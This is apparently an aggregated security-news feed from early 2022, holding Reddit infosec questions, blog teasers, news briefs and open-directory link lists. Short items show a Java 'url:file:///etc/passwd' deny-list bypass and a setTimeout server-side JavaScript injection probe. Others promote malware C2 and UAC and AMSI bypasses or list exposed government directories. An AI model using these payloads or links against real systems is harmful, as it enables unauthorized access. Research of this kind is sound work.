    The sites seem to be down but I will provide the links in case they are back on. https://old.economy.gov.ru/minec/resources/ https://old.economy.gov.ru/wps/wcm/connect/economylib4/designElements/resources/ These are the tweets that link me there: https://twitter.com/youranonone/status/1498685800241934342?s=21 https://twitter.com/anonymous_link/status/1498607316836536320?s=21 submitted by /u/__babygiraffe__ [link] [comments]
  • Open

    Which is the efficient way to practice web application security?
I read two books about web application security: "Web Application Security: Exploitation and Countermeasures for Modern Web Applications" and "Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities". But I didn't practice enough. I have multiple options to practice it: PortSwigger Web Security Academy, bWAPP, and Vulnerability Disclosure Programs on HackerOne. As I said, I already read books about this topic, so maybe I don't need to read the PortSwigger Academy articles. bWAPP is good, but it consists of lots of vulnerabilities and I can't figure out how to prepare a work plan for that (because of the vulnerability count and expertise levels). VDPs on HackerOne are good because they are real-life challenges, but I don't even know whether I am ready or not for testing real applications. I am open to any advice. submitted by /u/pacman0026 [link] [comments]
    Options for a malware sandbox with Internet access
I am looking for a solution to work with and detonate potentially malicious files & malware: an isolated (from the rest of the LAN) malware sandbox, with Internet access. I have been considering a Type 2 hypervisor such as VirtualBox running Windows 10 Pro. It seems if I go with this solution I may need a 2nd VM running a firewall to ensure the Win10 VM cannot spread malware to other devices on the LAN. Seeking input on other methods or options to build such an environment. submitted by /u/q_logsource [link] [comments]
    Help to improve AKS Pod's security
Hello. I want to use an Azure Kubernetes environment for running Azure DevOps build agents. Besides that, I tried to make the environment secure by following the principle of least privilege. As a result, I have a Dockerfile and Pod definition which run the container as an unprivileged user (nobody) on a read-only filesystem (except the /tmp and /azp paths). What else could be done to improve the environment's security? submitted by /u/groovy-sky [link] [comments]
    How do you organize your study?
Currently I work as a SOC analyst. I do like studying and coding, so after work I usually study some stuff related to security, but from time to time I find myself starting new courses without finishing anything, and reading about different topics but not being able to focus, which wastes much time and effort. I'm not sure if anyone else faces the same issue, and how can I focus more? submitted by /u/xoutisx [link] [comments]
    What are the biggest barriers stopping NetSec from going into Virtual Reality?
Specifically, imagine a Virtual Reality tool that would allow you to navigate your entire network in a three-dimensional space, to detect vulnerabilities and such. The first barrier that comes to mind would be the cost of equipment, especially if organizations need to buy multiple headsets for their employees. But what other barriers do you foresee? VR is already pretty popular, so I'm surprised it's not already more adopted in this space. Disclaimer: I work for a VR startup in the NetSec space and we are trying to gather feedback from NetSec professionals. You can visit our website if you want to learn more; we are offering headsets in exchange for good user feedback. There's a survey link on our contact us page: https://valkure.com TIA submitted by /u/loshofficial [link] [comments]
    Entire infosec team replaced by... IT team?
    Anyone ever experience this? I'm the last technical infosec person left on a former team of ~14 people. Now we have replaced the entire infosec team with IT/non-infosec people, who are all basically entry-level in infosec, although they may have skills in other areas such as IT/cloud. I feel genuinely concerned because it's clear none of them have the skills, knowledge or experience to do anything in these job functions security wise. They are just having tons of random meetings to try and figure out what to do next, and not actually getting anything done. They've been "talking" about what to do for 9 months. It's starting to feel like a scam, and I'm having to hold people's hands with extremely basic scripting and technical tasks. At first it was cool, because I had the opportunity to mentor them, but NOTHING is getting done. What the hell is going on? submitted by /u/netipotty [link] [comments]
    Is whitelisting DNS zones to prevent DNS tunneling viable? Why is it not more common?
    I'm concerned about malware which uses DNS channels to communicate home. I'm thinking about ways to mitigate this threat for my servers, and the most obvious measure that comes to mind, is to have my DNS resolver block recursive lookups to zones which are not whitelisted. So, the plan is to (1) make my firewall block all DNS traffic from my server except to my own resolver, and (2) have my own resolver block all lookups to non-whitelisted zones. So e.g., a lookup to *.microsoft.com would be recursively resolved, but not a lookup to *.evildomain.com. When Google searching for ways to mitigate DNS tunneling, this is not a commonly suggested countermeasure. Most blogs and articles answer this question by referring to some expensive, "smart", enterprisey DNS filter. Is my countermeasure less easy than it sounds? If not, why is this countermeasure not more common? submitted by /u/engineerL [link] [comments]
    What is the most difficult part of being a SOC Analyst?
Every job has pros and cons. What do you think about being a SOC analyst? A lot of people talk about stress and overworking. Maybe it's not worth being a SOC analyst? What do you guys think? submitted by /u/umuttosun [link] [comments]
    How to test our AV/EDR
    So if I remember well, a few years ago there were dedicated scripts and binaries to test if your AV/EDR works well, but I can’t find that anywhere. Do you have recommendations for that? What I’d like is to go a bit further than just compiling and running netcat/mimikatz… which would not involve running MSF modules at all. submitted by /u/EsreverEngineering [link] [comments]
    Not getting methodological approach to information audit. What are they trying to say?
    https://www.reddit.com/r/audit/comments/t47la5/not_getting_methodological_approach_to/ submitted by /u/whatusernameiscool [link] [comments]
    How do cybercriminals/"hackers" defend themselves?
I've always been puzzled by the idea that hackers are vulnerable themselves. Like, how can one say they are 100% defended from counter-attack? In any reading/research on cyber-defence I've ever done, the idea is you can never be 100% secure. Is it like an arms race of being "cleverer" than whoever might be on the counter-attack? Not sure if anyone can shed insight on this - thanks (editing post to say you can never be 100% secure, previously I had 10%) submitted by /u/mdgsec [link] [comments]
    Getting Started on Pentesting an IOT Device
    I'm relatively inexperienced at security and am trying to improve my skills. I have a custom made IOT device at home which I am trying to find vulnerabilities in and am looking for suggestions of what to investigate. I scanned with nmap using script=vulners. Only port 22 is open and there are a few vulnerabilities (OpenSSH 7.9p1) but nothing very promising as far as I can tell. Brute-forcing the SSH password using Hydra is also not very promising as it is fairly slow and I know the device has a reasonably complex password which is not in common password lists like rockyou. Any suggestions on other approaches to find vulnerabilities in the device? submitted by /u/MrKhutz [link] [comments]
    What is vulnerability sweeping?
I was asked the question of what vulnerability sweeping is, but I can't seem to find a definitive answer for it, only definitions for vulnerability scanning. submitted by /u/pleaseweallneedhelp [link] [comments]
  • Open

    Protests against Russia’s attack on Ukraine + more
    the discursus Protest Analytics newsletter, March 1st, 2022 edition. Continue reading on discursus.io »
    The Ides of March: Fall of the Russian Bear?
    A critical update has come across my feed. The New York Times lost the lede in a story today. Continue reading on Medium »
    Verify Viral Photos with Reverse Search
    How to use Google Reverse Image Search to verify the source of photos from Ukraine Russian conflict. Continue reading on Medium »
  • Open

    5 New Vulnerabilities in PJSIP Multimedia Library, including RCE
    submitted by /u/SRMish3 [link] [comments]
    Triaging A Malicious Docker Container
    submitted by /u/MiguelHzBz [link] [comments]
    Multiple vulnerabilities found in voip monitor by an Ethiopian Security firm
    submitted by /u/nathanAbejeM [link] [comments]
    TeaBot is now spreading across the globe | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
    Exploiting CVE-2021-26708 (Linux kernel) with sshd
    submitted by /u/hardenedvault [link] [comments]
  • Open

    MySQL DUMPFILE
This article aims to reinforce the importance of performing hardening and/or a security review before putting a server into… Continue reading on 100security »
    Analysis of a trojanized anydesk
    This blog provides a detailed analysis of anydesk application that has been trojanized and distributed from a ranked unofficial website… Continue reading on Medium »
  • Open

    Password Reset to Admin Access
While testing a web application that used a web GUI on top of an API, I noted the calls to the API were authorized with a JWT token… Continue reading on Techiepedia »
    What After 12th? as an Ethical Hacker.
    This is not an accurate path for an ethical hacker. Continue reading on Medium »
    No Rate Limiting on Forget Password Page (Email Triggering)
    Vulnerability Category: A6- Security Misconfiguration Continue reading on Medium »
    Facing Issues with Nuclei upgrade??
    Few weeks back, I too faced the same situation. Tried multiple ways to upgrade my Nuclei version but it just got stuck at version 2.2.0… Continue reading on Medium »
On the way to 2nd Bounty: XSS and Apache server.
Hello readers, in this post we'll look at XSS and Apache Server; further on Apache server I will post another article. Continue reading on Medium »
  • Open

    SecWiki News 2022-03-01 Review
A discussion of the BPF covert channel in "Bvp47: Top-tier Backdoor of US NSA Equation Group" by ourren; DICOS: a method for discovering insecure code in the Stack Overflow community by ourren; An explanation of "BAS", the hottest security technology of 2022 by ourren. For more of the latest articles, visit SecWiki
  • Open

A dynamic CNN model for identifying fake profiles in online social networks
Online social networks (OSNs) are popular applications for sharing all kinds of data, including text, photos and videos. However, the problem of fake accounts is one of the obstacles facing current OSN systems. Attackers use fake accounts to distribute misleading information, such as malware, viruses or malicious UR
Algorithmic recommendation management regulations take effect on March 1; algorithm filing system officially launched
The Regulations make clear that applying algorithmic recommendation technology means using algorithmic techniques such as generation and synthesis, personalized push, ranking and selection, retrieval and filtering, and scheduling and decision-making to provide information to users.
Conti backs Russia; a Ukrainian member publishes its internal chat logs
Right after the Conti ransomware group chose to side with Russia, a Ukrainian member leaked more than 60,000 messages from Conti's internal chats.
FreeBuf Morning Report | Insurance giant AON hit by cyberattack over the weekend; Moscow Exchange taken down by cyberattack
Microsoft revealed that several hours before the invasion, Ukrainian entities were targeted by previously undetected malware, FoxBlade. The Microsoft Threat Intelligence Center (MSTIC) continues to investigate attacks against...
Insurance giant AON suffers cyberattack
AON disclosed that it suffered a cyberattack on February 25, 2022. In its report, beyond stating that the attack occurred and affected a limited number of systems, AON provided no further details.
Toyota halts production at Japanese plants after supplier hit by cyberattack
Because Kojima Industries, the supplier of interior and exterior plastic parts to Toyota, was hit by a cyberattack, Toyota suspended production at its Japanese plants from March 1.
Cyber warfare has become the "fifth battlefield"; these figures show the state of Ukraine's networks
Cyber warfare has developed into a domain with the same standing as sea, land, air and space, and is also listed as the "fifth battlefield".
  • Open

Demonstration of how to use Counter-Strike 1.6 as Malware C2
    If you're a malware operator who likes to Rush B and want to manage your victims while playing games, this is for you. https://www.youtube.com/watch?v=b2L1lWtwBiI&t=1s https://twitter.com/kaganisildak/status/1498585440680656896 submitted by /u/kaganisildak [link] [comments]
  • Open

    Session Fixation on Acronis
    Acronis disclosed a bug submitted by hatnare: https://hackerone.com/reports/1486341
  • Open

    Exploiting CVE-2021-26708 (Linux kernel) with sshd
    Article URL: https://hardenedvault.net/2022/03/01/poc-cve-2021-26708.html Comments URL: https://news.ycombinator.com/item?id=30511060 Points: 2 # Comments: 0
  • Open

    Windows Exploitation Research
Hi, I am starting Windows security research to understand how Windows internals work and how one can exploit them. If anyone is interested, he/she can DM me. submitted by /u/i_whiteheart [link] [comments]
  • Open

    Samsung Encryption Vulnerability [pdf]
    Article URL: https://eprint.iacr.org/2022/208.pdf Comments URL: https://news.ycombinator.com/item?id=30510543 Points: 1 # Comments: 0

  • Open

    Essential Skills to be a SOC Analyst
    Hi all, This video covers what the essential mindsets are to be an effective SOC analyst. It covers WHAT the mindsets are, WHY they are relevant to a SOC analyst, and HOW these mindsets can be developed. This is far more important than technical skills which can be taught. So, if you are a ‘new’ or aspiring analyst, or an experienced senior analyst, or even if you are on the periphery of cyber security in IT or are just curious, this video will have something for you. Happy Cybering! https://youtu.be/HOFfYUd7DbE submitted by /u/SyPy [link] [comments]
    how to deal with phishing email in a big company?
I'm a new graduate and I had a job interview for a SOC analyst position. One of the questions that kinda confused me is "how do you identify and deal with phishing emails?". First I answered with the basic clues: weird email address; unknown domain; bad grammar/spelling; no asking for sensitive data; no shady URLs/files; and use plugins to analyse the emails. But they told me, what if the email seems perfect, like a gmail domain, good spelling and formatting and no URLs or files attached. In my mind I'm thinking, so how is this a phishing email if there is nothing suspicious in it? But I still tried to answer, saying that you can teach your employees to be aware of such emails and to report them to the security team in case they find a suspicious email. They answered, what if the company has thousands of employees, how is the security team gonna deal with potentially hundreds of emails from the employees? At this point I got nothing else to say. What am I supposed to answer in this situation? Thanks. submitted by /u/Dalleuh [link] [comments]
    Third party library license risk with Single Page Applications
Many open source licenses have different rules depending on whether the library is used with a SaaS product or an externally deployed product. Does using an open source library within a Single Page Application architecture mean the library is now deployed to the user's browser and thus is externally deployed? submitted by /u/jrminty [link] [comments]
    Struggling to learn networks,can i learn it through programming and GNS3?
Hi, so on my last infosec interview the guy told me to study more networks, and he suggested studying the content of Network+. I am trying to learn from Mike Myers's course but struggling badly. There is a lot of theory here and I keep missing a lot of points. So I want to learn it more practically and in parallel learn the theory. I am good with programming and I have GNS3. So my question: can I learn networking and Network+ content through network programming and GNS3? submitted by /u/Ramseesthe4th [link] [comments]
  • Open

What is a Google Dork and how is it used?
OSINT techniques Continue reading on Medium »
  • Open

    The (Mis)Use of Artifact Categories
Very often in DFIR, we categorize artifacts in an easy-to-understand and easy-to-digest manner, as using or relying on these categories often helps us navigate our investigations. There are also times when we reduce those artifacts to a level where they're easier to understand, and in doing so, the categorization of the artifact isn't quite accurate. As such, it's necessary now and again to go back and take a look at that categorization to determine if it still holds, or if it truly served the community in the manner intended. SPOILER ALERT - TL;DR: Within the DFIR community, we should not be hanging investigation findings on single artifacts in isolation. If there are gaps in data, they need to be recognized, understood and communicated. Do not spackle those gaps over with guesswork and assu…
  • Open

    Breaking Google’s ReCaptcha v2 using.. Google.. Again
    submitted by /u/n0llbyte [link] [comments]
    Rouge RDP: New Initial Access Technique via RDP Bypassing Clients/Servers/Security Vendors
    submitted by /u/ustayready [link] [comments]
    Alan c2 Framework v6.0: Alan + JavaScript = ♡
    submitted by /u/aparata_s4tan [link] [comments]
  • Open

    Phishing
In the digital world everyone uses smart devices for day-to-day activity. We're sharing a lot of information, and at the same time receiving many… Continue reading on Medium »
    BYPASS AMSI
Cooking up our recipe with PowerShell and C# Continue reading on Medium »
  • Open

    Does anyone know how I can mount a raw/image that is encrypted with LUKS? I have the decryption password.
    Does anyone know how I can mount a raw/image that is encrypted with LUKS? I have the decryption password. submitted by /u/rvndomus3r2019 [link] [comments]
    Is there a way to find out whether the timestamp on a file has been modified?
I know it's very easy to modify the "Date created" and "Date Modified" attributes of a file. Is there any way to know if these timestamps have been modified? Can I look at a list of dates modified? Any logs or tools? Before someone suggests it, backup won't help because the last VSS available is from before the file was initially created. The file was created within the last 14 days, and I have reason to believe that the date has been modified. I'd really appreciate the help. submitted by /u/Serious_Mongoose_522 [link] [comments]
    Let's Talk About NTFS Index Attributes
    Good morning, It’s time for a new 13Cubed episode! Let’s revisit a critical NTFS artifact: NTFS Index Attributes (also referred to as $I30 files). We'll cover all of the information you need to know, and take a look at a new tool called INDXRipper. Episode: https://www.youtube.com/watch?v=x-M-wyq3BXA Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
  • Open

    microscopic aquatic animals
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
Files from Cleveland State Community College
    http://www.clevelandstatecc.edu/content/ submitted by /u/depressedclassical [link] [comments]
    1980s and early 1990s software
    http://cd.textfiles.com/dfeno1/ submitted by /u/depressedclassical [link] [comments]
  • Open

    AlbusSec:- Penetration-List 04 File Inclusion
Hello Members, I hope that you liked the Penetration-List Project. Therefore, I worked hard to complete the Penetration-List Project. Firstly, I… Continue reading on Medium »
    My Pentest Log -8-
    Greetings from Caenopolis to all, Continue reading on Medium »
    Jax.Network weekly update
    by Maryna Trifonova, Head of Content at Jax.Network Continue reading on Jax.Network Blog »
How anyone could have gotten a free pass to attend @IWCON2022
    Recently I attended InfoSec Community (@InfoSecComm) ‘s security conference IWCON2022. Awesome conference and awesome experience attending… Continue reading on Medium »
    NMAP commands
    Basic Scan on a Single IP: Continue reading on Medium »
    Everything you need to know about Bug Bounties
    What are Bug Bounty Programs Continue reading on Medium »
  • Open

    SecWiki News 2022-02-28 Review
SecWiki Weekly (Issue 417) by ourren; Promoting vulnerability assessment through PoC migration by ourren. For more of the latest articles, visit SecWiki
  • Open

Bypassing deny-list based protocol validation using the url: prefix
phithon_xg posted an interesting trick on Twitter, and since it can be useful in real analysis, I have summarized it briefly to share. Bypass protocol check in Java: the URLs below, which carry the url: prefix, behave in Java's URL class exactly like http:// and file:// respectively. url:http://127.0.0.1:8080 url:file:///etc/passwd So if the protocol is being validated against a deny-list, this url prefix becomes a point where the check can be bypassed. // Assume check() is a function that blocks URLs starting with file://, // and if inputURL is url:file:///sdcard/blahblah.
  • Open

    Climate Change 2022: Impacts, Adaptation and Vulnerability
    Article URL: https://www.ipcc.ch/report/ar6/wg2/ Comments URL: https://news.ycombinator.com/item?id=30500104 Points: 2 # Comments: 0
  • Open

    Stack-based Buffer Overflow Series (aimed at beginners)
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

WeBank application security team hiring | Shenzhen
WeBank's application security team is hiring for application security positions
Ukraine recruits an "IT army"; 31 Russian entities become attack targets
Ukraine intends to form a volunteer "IT army" to carry out cyberattacks against Russia.
FreeBuf Morning Report | Meta blocks Russian state media accounts in Ukraine; Iranian hacking group attacks with new malware
Ukraine is recruiting a volunteer IT army of white-hat hackers to launch attacks against a range of Russian entities.
The benefits of wildcard SSL certificates and how to choose one
Many websites, for business reasons, have multiple subdomains under the same primary domain. In this situation, applying for an SSL certificate requires care: you must consider both the site's security needs and cost-effectiveness, and the first choice is certainly
China Everbright Bank security department recruitment notice
Hiring for security engineer, security operations, security management and other positions.
Zhang Qiming, deputy head of the Anhui Provincial Party Committee's United Front Work Department, leads a delegation to inspect the Hefei R&D base of 全息网御
Recently, Zhang Qiming, deputy head of the Anhui Provincial United Front Work Department, led a delegation to inspect the Hefei R&D base of 全息网御, focusing on the company's independently developed core technologies, its industry positioning centered on data security and its ecosystem-partnership application scenarios, and held in-depth discussions on the future development of technology enterprises. He pointed out
GPU giant NVIDIA hit by "devastating" cyberattack; top malware shuts down its botnet infrastructure | Global cybersecurity hot topics, February 28
The modular Windows crimeware platform known as TrickBot formally shut down its infrastructure on Thursday, after earlier reports that it was about to retire during a nearly two-month lull in activity.
EU formally publishes the Data Act; Ukraine hit by DDoS attacks again; kitchenware giant Meyer attacked and internal data leaked | Cybersecurity weekly
On February 23, the European Commission published a proposal called the Data Act, intended to help small companies catch up with large ones in competition by profiting from the non-personal data generated by connected products, from smart appliances to cars.
Detailed notes on PortSwigger's File Upload series
I actually heard about file upload vulnerabilities a long time ago and solved some challenges in CTF competitions; let's go through PortSwigger's labs once more.
Anonymous breaches the internal network of Belarusian Railways
Anonymous breached Belarusian networks and affected its railway operations.
NVIDIA hit by cyberattack, 1TB of data stolen
The attack affected the company's developer tools and email systems, and 1TB of data including employee online credentials was stolen.
In 2021, exploitation of unpatched vulnerabilities was the main entry point relied on for ransomware attacks
Attacks caused by exploitation of unpatched software vulnerabilities rose 33%; this was the entry point ransomware attackers relied on most in 2021, accounting for 44% of ransomware attack causes.
  • Open

    Invicti Security Adds Software Composition Analysis to Its Industry-Leading AppSec Platform
    With headline-grabbing vulnerabilities such as Log4Shell drawing attention to the risks presented by open-source components, organizations increasingly need application security programs that address this risk.
    DAST, IAST, SCA: Deeper coverage in a single scan
    With Invicti SCA as part of your application security program, you can track and secure open-source components for deeper coverage in one single scan.
  • Open

    File Transfer Filter Bypass: Exe2Hex
    Introduction Exe2hex is a tool developed by g0tmilk which can be found here. The tool transcribes EXE into a series of hexadecimal strings which can The post File Transfer Filter Bypass: Exe2Hex appeared first on Hacking Articles.
    Windows Persistence: Shortcut Modification (T1547)
    Introduction According to MITRE, “Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level The post Windows Persistence: Shortcut Modification (T1547) appeared first on Hacking Articles.
  • Open

    Argo Security Automation with OSS-Fuzz
    Continuous Fuzzing Integration in Argo Continue reading on Argo Project »
  • Open

    How to copy the text in photos?
    Techniques used in open source intelligence Continue reading on Medium »
    I hate Marinas, It's too Crowded —OSINT Challenge 21 and 22
    While I was reading some Medium blogs, I came across @Sofia Santos's blogs (this writeup specifically: Walkthrough — Hacktoria… Continue reading on Medium »
    Mind your shadow: how do we tell when a photo was taken from the shadows in it?
    Techniques used in open source intelligence Continue reading on Medium »
    The Current State of the Cyber War Between Russia and Ukraine — An OSINT Analysis
    Go through the following OSINT analysis courtesy of Dancho Danchev on the current state of the cyber war between Russia and Ukraine. Enjoy! Continue reading on Medium »
  • Open

    Large Amount of IPs coming from Europe
    Hi, Little background info first. I'm a beginner Networking & Security student so I'm not that unfamiliar with stuff, I don't have anything hosted other than a VPN, and I'm using a consumer grade router that's not capable of VLANs, and other good stuff. I may be just a little paranoid but I've been noticing a lot of blocked IP requests from Russia in the security log for my router. Almost 50% of what I found in the log for February 27 is from over there. One of the IPs I found had 32 hits, another had just 9. Coming in second is the US, then there's Switzerland, Germany, Lithuania. From just the couple of foreign IPs that I looked up using https://www.abuseipdb.com/, all of them were flagged for high confidence of abuse. I don't have anything against those countries but I was wondering, with all that's going on, if I should be more concerned than usual. I'd just like my computer and data to remain in one piece. Not sure if I should be saying anything else about my setup on a public post here but I could appreciate some advice. Only tech guy in my family so I can't ask anyone else. I'm considering just disabling the VPN so I don't have any more open ports, and using iCloud Private Relay or something else when I'm out. I'm aware of pfSense, and I was considering it, but I just don't want to spend $$$ with inflation, chip shortages, and who knows what else. Anyway thanks in advance. submitted by /u/Expensive-Exit6398
    How does cross-browser checking work?
    I am not familiar with technology. But this kinda freaked me out. https://fingerprintjs.com/blog/external-protocol-flooding/ Following the article, I went ahead and did this test, https://schemeflood.com/ I recently installed Fedora on my desktop but it showed all the apps I installed on Windows previously. (It's not a dual boot.) Did I mess something up when installing? Or is it a vulnerability? submitted by /u/manho1e
    What are your methods for investigating JA3 & JA3S IOC hits?
    What sites do you use to validate information? Even if the certificate is valid, how are you ensuring it's for the proper site? What if the certificate says self-signed or expired? submitted by /u/pass-the-word
  • Open

    Qualys Vulnerability Detection Pipeline
    Article URL: https://qualys-secure.force.com/discussions/s/ Comments URL: https://news.ycombinator.com/item?id=30492601 Points: 2 # Comments: 0
  • Open

    Various government open directories
    https://www.mendoza.gov.ar/wp-content/uploads/ https://www.mrt.tas.gov.au/mrtdoc/ https://hret.gov.ph/admin.hret.gov.ph/ https://tuguegaraocity.gov.ph/public/ https://tuguegaraocity.gov.ph/admin/ (sometimes throws a PHP error for some reason) https://web.yme.gov.gr/data/ https://geoftp.ibge.gov.br/ http://www.pmf.sc.gov.br/arquivos/arquivos/ http://maps.six.nsw.gov.au/csv/ http://globe.six.nsw.gov.au/csv/ https://irs.os.gov.ng/wp-content/uploads/ https://online.agriculture.gov.au/static/department/ http://itaperuna.rj.gov.br/planoDiretorArquivos/ https://www.czj.sh.gov.cn/zss/ http://www.mto.gov.on.ca/documents/ https://tnlandsurvey.tn.gov.in/assets2/correlation/ (/assets2/ returns 403, /assets/ returns phpinfo()) https://info.saude.df.gov.br/wp-content/uploads/ http://www…
    A full Google Drive as an archive related to my time in Psychic TV in the '90s. Music, photos, multimedia. And current projects.
    submitted by /u/inoculatemedia
    Movies, shows and 'more'
    http://51.77.66.14/ some good NSFW stuff in the sarasa folder submitted by /u/LucasImages
  • Open

    Brian Rea (DeviantOllum Deviant) and Lesley Carhart (Hacks4Pancakes) continue their harassment of me
    Please notice I left these people alone for a long period of time and then they start harassing me. Seriously search for when I've mentioned them here last. The line I crossed with her, I blocked her mostly because she pushed some silly stuff that ended my con.
  • Open

    Attacking IBM MQ — SWIFT to Steal Money$$$
    What is IBM MQ? Continue reading on Medium »
    All about Account Takeover
    Account Takeover Methods Continue reading on InfoSec Write-ups »
    StaFi and Immunefi Partner to Launch A Bug Bounty For rDex Testnet
    Introduction Continue reading on Medium »
    Finding EXIF Geo-location of images
    Let us learn about finding EXIF Geo-Location of images Continue reading on Medium »
    Methods to Bypass two-factor Authentication
    There are multiple ways to bypass two-factor authentication; some of these ways are here. Continue reading on Medium »
    BUG BOUNTY CHECK LIST BY C1
    C1h2e1 Continue reading on Medium »
    Easy Windows 0 day UAC Bypass!
    Hey guys! I am harish, I used to find vulnerabilities on the Microsoft bug bounty program and Google VRP! Continue reading on Medium »
  • Open

    We Put A C2 In Your Notetaking App: OffensiveNotion
    A Red Teaming Science Fair Project Continue reading on Medium »
  • Open

    Special 50% Discount for My 100GB "Cybercrime Forum Data Set for 2022" Today! Grab a Copy Today!
    Dear blog readers, Who wants to obtain direct download access to my 100GB "Cybercrime Forum Data Set for 2022" with a 50% discount which I'm offering only today for research data mining and enrichment purposes? Drop me a line at dancho.danchev@hush.com Sample photos of the actual content: Stay tuned!
    Courtesy of Republic of Bulgaria!
    This is me! And this is me! On the run. Awesome! Cool! Awesome! More cool stuff! Even more cool stuff! Including this! Including this! This is cool! Even more cool! - check out the Illegal Restraint section! Awesome! Quote: "The Mentally Ill or Disabled" With few exceptions, material conditions in psychiatric hospitals and social care institutions for children and adults with developmental
    Profiling a Currently Active High-Profile Cybercriminals Portfolio of Ransomware-Themed Extortion Email Addresses - Part Four
    Dear blog readers, Continuing the "Profiling a Currently Active High-Profile Cybercriminals Portfolio of Ransomware-Themed Extortion Email Addresses - Part Three" blog post series, I've decided to share yet another currently active portfolio of ransomware-themed email address accounts currently involved in a variety of campaigns. Sample ransomware-themed personal email address accounts known to
    The Cyber War Between Russia and Ukraine - An OSINT Analysis
    Dear blog readers, I've decided to take a deeper look inside the currently ongoing cyber war between Russia and Ukraine and I've decided to provide actionable intelligence on the online whereabouts and actual campaign infrastructure behind the currently ongoing campaigns, which appear to be several crowd-sourced campaigns which I profiled, including various other modest engagement "touch points"
  • Open

    SecWiki News 2022-02-27 Review
    Customizing the AWVS Docker image by sinver; for more of the latest articles, visit SecWiki
  • Open

    CSS-based data exfiltration using Sequential Import Chaining
    Today I want to talk about Sequential Import Chaining, a CSS-based attack technique. On its own it does not have much impact, but it is a way to amplify impact when you can control CSS, so be sure to know it and put it to good use 😊 Sequential Import Chaining: Sequential Import Chaining is an attack technique proposed by d0nutptr and is one of the exploitation methods for raising the impact of a CSS Injection or an RPO (Relative Path Overwrite). The method uses a CSS feature called Attribute Selectors, that is, the feature that lets you apply styles depending on the value of a DOM object.
  • Open

    Circumventing Deep Packet Inspection with Socat and rot13
    submitted by /u/jrj334
    ZDI-CAN-12671: Windows Kernel DoS/Privilege Escalation via a NULL Pointer Deref
    submitted by /u/yuhong

  • Open

    Intigriti’s February XSS challenge By aszx87410
    February’s XSS challenge is here! On the surface the challenge seems simple but it actually gives light upon two very interesting topics … Continue reading on Medium »
    From zero to hero – XSS
    This article is about what you need to know about Cross-Site-Scripting(AKA. XSS). Continue reading on Medium »
  • Open

    Server-Side Javascript Injection (SSJI)
    🔍 Introduction SSJI (Server Side Javascript Injection) is an attack in which, when a server has its own engine for processing JavaScript or has backend logic that processes it through a headless browser or similar, an attacker takes control of that processing to execute the JavaScript they want on the server side. 🗡 Offensive techniques Detect: send requests containing JS functions such as eval(), setTimeout() and setInterval() and identify whether the server side processes them. The simplest method is a delay check using setTimeout and setInterval. Request GET /import?unloadcode=setTimeout(a%3d1,%205000) HTTP/1.1 Response HTTP/1.
    Relative Path Overwrite (RPO)
    🔍 Introduction RPO (Relative Path Overwrite) is an attack method that overwrites relative URLs, i.e. URLs based on relative paths, to cause unintended behavior. It is also called Relative Path Confusion; this document uses RPO throughout. Note that RPO as discussed in a web context differs slightly from the Relative Path (e.g. ../../app) and Absolute Path (e.g. /app) used in the system sense. Path / Description / Example: Absolute URL: a URL that includes the host; Relative URL: a URL that does not include the host, e.g. <src="/file.
  • Open

    How to geolocate a Twitter video using free OSINT tools
    And how relying on information from the news can set you back. Continue reading on Medium »
    Open Source Intelligence — OSINT
    Open Source Continue reading on Medium »
  • Open

    Fuzzing Network Servers with De-Socketing
    submitted by /u/martinclauss
    The Ransomware Files podcast: In 2019, 23 cities in Texas were infected with the REvil ransomware in a huge attack. The cities recovered quickly but an MSP, whose ScreenConnect software was exploited, was irreparably damaged. It's a heartbreaking story that reveals the human cost of ransomware.
    submitted by /u/ferrochron1
  • Open

    Zulip Cloud security vulnerability with reusable invitation links
    Article URL: https://blog.zulip.com/2022/02/25/zulip-cloud-invitation-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30479430 Points: 81 # Comments: 29
  • Open

    SecWiki News 2022-02-26 Review
    No news updated yet today~ For more of the latest articles, visit SecWiki
  • Open

    Give Me Some (macOS) Context…
    This blog post will dive into what I like to call “execution contexts” on macOS and why it is important to understand these different… Continue reading on Medium »
  • Open

    Wget security questions
    Are there any security concerns with using wget? Is there anything I should be aware of to stay relatively safe? submitted by /u/fenriswolf_411
    This sub is being mentioned on Ukraine related subs.
    There are talks requesting that videos, images, etc. be archived from r/Ukraine just in case information starts disappearing. Not sure if you guys do that sort of thing but having seen this sub mentioned I figured I'd bring it up here. submitted by /u/Tripartist1
    The official SteamOS repo, including ISOs of internal versions.
    submitted by /u/wertercatt
  • Open

    Examining a Windows LTSC system
    How much more difficult is it to gather evidence from a Windows operating system that is the LTSC version when compared with a regular Windows system? I know LTSC is supposed to be much more privacy friendly and disables telemetry so I just thought I would ask out of curiosity. submitted by /u/xnospax
  • Open

    Kali Linux: Top 5 tools for information gathering
    What is information gathering? Continue reading on Medium »
    My first bug in just 5 minutes
    Hello hacker, today I'm going to tell you how I found my first bug (vulnerability) in just 5 minutes Continue reading on Medium »
    SSRF & LFI In Uploads Feature
    Hello fellow hackers, today I will discuss how I found a Server-Side Request Forgery (SSRF) which led to a Local File Inclusion (LFI)… Continue reading on Medium »
  • Open

    Alan c2 Framework v6.0: Alan + JavaScript = ♡
    submitted by /u/aparata_s4tan
  • Open

    Bypass Email Verification in Customer Portal
    Mattermost disclosed a bug submitted by odx09: https://hackerone.com/reports/1443211 - Bounty: $150
  • Open

    Android App Pentest
    Just got into Android app pentest. The app has a functionality to purchase courses, so what can be the best way to bypass it? Intercepting it through Burp and trying some manipulation as we do in web apps, or will some reverse engineering stuff work here (which I don't think makes sense)? If anybody has any experience pentesting apps with similar functionalities, your help is appreciated!! submitted by /u/Chirag_Offsec22
    Moving Into cyber security!
